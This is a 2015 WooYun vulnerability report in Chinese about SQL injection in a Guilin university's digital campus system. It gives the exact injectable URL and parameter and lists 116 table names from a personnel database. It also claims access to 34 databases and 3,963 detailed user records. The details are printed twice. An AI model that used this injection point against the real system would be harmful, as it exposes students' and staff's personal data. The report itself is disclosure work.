漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0140610
漏洞标题:桂林电子科技大学数字化校园系统注入导致学校34个数据库泄露#内部学生教师信息泄露(3963)以及OA系统数据
相关厂商:桂林电子科技大学
漏洞作者: fly0x1024
提交时间:2015-09-12 09:18
修复时间:2015-09-17 09:20
公开时间:2015-09-17 09:20
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:10
漏洞状态:已交由第三方合作机构(CCERT教育网应急响应组)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-09-12: 细节已通知厂商并且等待厂商处理中
2015-09-17: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
桂林电子科技大学数字化校园系统注入导致学校34个数据库泄露#内部学生教师信息泄露(3963)以及OA系统数据
详细说明:
注点链接:
http://szhxy.guet.edu.cn/qxgl/public/RegArm.aspx?userid=a
orical数据库,有34个数据库,包含内部OA
当前库:GSGL
[116 tables]
+----------------+
| CZGZFF |
| CZGZPC |
| DM_BZLB |
| DM_GATQ |
| DM_HKXZ |
| DM_JZGLB |
| DM_RKZK |
| DM_XX |
| DWJBXX |
| FXJ |
| GB_BRCF |
| GB_HYZK |
| GB_JKZK |
| GB_JTCS |
| GB_XW |
| GZBD |
| GZBDTZ |
| JBXXLB |
| JFDWQK |
| LPGZ |
| LPGZFF |
| LPXLDBZ |
| LTXCZGZ |
| LTXCZGZFF |
| LTXGZZS |
| LTXJT |
| LTXJTFF |
| MZ |
| ODBC_IMPORT |
| ODBC_XNJT |
| PLAN_TABLE |
| PRIVILEGE |
| PYGZ |
| PYGZFF |
| RSBB |
| RSCCXX |
| RSCGRY |
| RSDZLB |
| RSGSDY |
| RSGWBD |
| RSGWLB |
| RSGWXX |
| RSGWYPRY |
| RSGWZSXX |
| RSGZFPXX |
| RSHT |
| RSJBDJB |
| RSJBXIMP |
| RSJBXX |
| RSJBXXFROM |
| RSJBXXIMP |
| RSJGBZ |
| RSJLI |
| RSJLXX |
| RSJQSZ |
| RSJSLB |
| RSJTJBXX |
| RSJTQTCY |
| RSJXXX |
| RSKH |
| RSKQDA |
| RSKQGZ |
| RSKQJSJB |
| RSKSGL |
| RSKSLX |
| RSLTXXX |
| RSLXXX |
| RSLYXX |
| RSPOQK |
| RSPXLX |
| RSQJGL |
| RSRCQB |
| RSRCXQJH |
| RSROLE |
| RSTCH |
| RSTCH2 |
| RSUSERROLE |
| RSWJGL |
| RSXLXW |
| RSXNYD |
| RSXSJL |
| RSXXFYB |
| RSXXZTB |
| RSXZDPZW |
| RSYPXX |
| RSYPZXX |
| RSZCPSQK |
| RSZPFA |
| RSZYJSZW |
| RSZZMMXX |
| RXYXRC |
| RYLB |
| TEXT_IMPZZ |
| TEXT_LPGZFF |
| TEXT_LTX |
| TQ |
| TQJL |
| USERACTIVATION |
| WHCD |
| XJGZTG |
| XNPC |
| XWUSERS |
| YSBZ |
| YXRCLB |
| ZC |
| ZCBD |
| ZCJB |
| ZW |
| ZWBD |
| ZWJB |
| ZZCZGZ |
| ZZGWGZ |
| ZZGZ_I |
| ZZJT |
| ZZJTFF |
| ZZMM |
+----------------+
XWUSERS表有3963个用户(用户信息非常详细):
当前用户成功访问OA数据库:
用户表也可以成功访问:
这个注点数据量很大的,就不再深入研究了。
漏洞证明:
注点链接:
http://szhxy.guet.edu.cn/qxgl/public/RegArm.aspx?userid=a
orical数据库,有34个数据库,包含内部OA
当前库:GSGL
[116 tables]
+----------------+
| CZGZFF |
| CZGZPC |
| DM_BZLB |
| DM_GATQ |
| DM_HKXZ |
| DM_JZGLB |
| DM_RKZK |
| DM_XX |
| DWJBXX |
| FXJ |
| GB_BRCF |
| GB_HYZK |
| GB_JKZK |
| GB_JTCS |
| GB_XW |
| GZBD |
| GZBDTZ |
| JBXXLB |
| JFDWQK |
| LPGZ |
| LPGZFF |
| LPXLDBZ |
| LTXCZGZ |
| LTXCZGZFF |
| LTXGZZS |
| LTXJT |
| LTXJTFF |
| MZ |
| ODBC_IMPORT |
| ODBC_XNJT |
| PLAN_TABLE |
| PRIVILEGE |
| PYGZ |
| PYGZFF |
| RSBB |
| RSCCXX |
| RSCGRY |
| RSDZLB |
| RSGSDY |
| RSGWBD |
| RSGWLB |
| RSGWXX |
| RSGWYPRY |
| RSGWZSXX |
| RSGZFPXX |
| RSHT |
| RSJBDJB |
| RSJBXIMP |
| RSJBXX |
| RSJBXXFROM |
| RSJBXXIMP |
| RSJGBZ |
| RSJLI |
| RSJLXX |
| RSJQSZ |
| RSJSLB |
| RSJTJBXX |
| RSJTQTCY |
| RSJXXX |
| RSKH |
| RSKQDA |
| RSKQGZ |
| RSKQJSJB |
| RSKSGL |
| RSKSLX |
| RSLTXXX |
| RSLXXX |
| RSLYXX |
| RSPOQK |
| RSPXLX |
| RSQJGL |
| RSRCQB |
| RSRCXQJH |
| RSROLE |
| RSTCH |
| RSTCH2 |
| RSUSERROLE |
| RSWJGL |
| RSXLXW |
| RSXNYD |
| RSXSJL |
| RSXXFYB |
| RSXXZTB |
| RSXZDPZW |
| RSYPXX |
| RSYPZXX |
| RSZCPSQK |
| RSZPFA |
| RSZYJSZW |
| RSZZMMXX |
| RXYXRC |
| RYLB |
| TEXT_IMPZZ |
| TEXT_LPGZFF |
| TEXT_LTX |
| TQ |
| TQJL |
| USERACTIVATION |
| WHCD |
| XJGZTG |
| XNPC |
| XWUSERS |
| YSBZ |
| YXRCLB |
| ZC |
| ZCBD |
| ZCJB |
| ZW |
| ZWBD |
| ZWJB |
| ZZCZGZ |
| ZZGWGZ |
| ZZGZ_I |
| ZZJT |
| ZZJTFF |
| ZZMM |
+----------------+
XWUSERS表有3963个用户(用户信息非常详细):
当前用户成功访问OA数据库:
用户表也可以成功访问:
这个注点数据量很大的,就不再深入研究了。
修复方案:
过滤注点
版权声明:转载请注明来源 fly0x1024@乌云
漏洞回应
厂商回应:
危害等级:无影响厂商忽略
忽略时间:2015-09-17 09:20
厂商回复:
最新状态:
暂无